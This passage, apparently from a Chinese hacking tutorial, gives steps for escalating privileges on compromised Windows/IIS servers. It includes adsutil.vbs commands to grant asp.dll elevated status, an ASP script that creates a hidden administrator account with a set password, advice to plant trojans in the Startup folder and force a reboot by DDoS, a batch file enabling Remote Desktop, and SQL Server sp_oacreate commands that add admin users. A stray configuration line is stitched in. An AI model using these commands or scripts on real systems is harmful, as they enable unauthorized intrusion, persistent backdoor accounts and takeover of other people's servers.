6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升，好象效果不明显
<<%Response.Expires=0">%@codepage=936%><%Response.Expires=0 
on error resume next 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user","WekweN$") 
od.SetPassword "WekweN" <-----密码
od.SetInfo 
Set of=GetObject(oz&"/WekweN$,user") 
oe.Add(of.ADsPath) 
Response.write "WekweN$ 超级帐号建立成功!"%>


用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:\Program Files\Java Web Start\
这里如果可以，一般很小，可以尝试用jsp的webshell，听说权限很小，本人没有遇见过。

9.最后了，如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs等木马。

等到主机重启或者你ddos逼它重启，来达到权限提升的目的。
[EXTERNAL]
ClientCheckDLL1=servu.dll

1:找台有4899的机器,可以进行4899登陆(前提) 

2:把下列文字生成*.BAT传到肉鸡的C:下 

echo [Components] > c:\sql 
echo TSEnable = on >> c:\sql 
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 

再用黑社会软件对其进行TELNET登陆并执行此文件,执行有个过程,一般3~5分钟不= 

之后你可以扫描,发现他的3389端口开了!OK! 

3:帐号建立 http://ww3.tty-1.net:808/main.htm

在肉鸡的TELNET下输入 

net user 你想建立的用户名字 你想建立的用户密码 /add 

net localgroup administrators 你建立的用户名字 /add 

如果执行成功,则之后会命令下会有一排字"命令执行成功",等这条出现后再执行下一条即可 

4:OK!成功!登陆吧!
使用sql的查询分析器并登陆
写入代码

declare @shell int exec sp_oacreate 'wscript.shell',
@shell output exec sp_oamethod @shell, 'run','null,'c:\winnt\system\cmd.exe /c net user 123 456 /add'

/不用多说创建用户为123密码为456/

declare @shell int exec sp_oacreate'wscript.shell',
@shell output exec sp_oamethod @shell,'run',null,'C:\winnt\system32\cmd.exe/ c net localgroup administrators 123/add',

上一页  [1] [2] [3] 下一页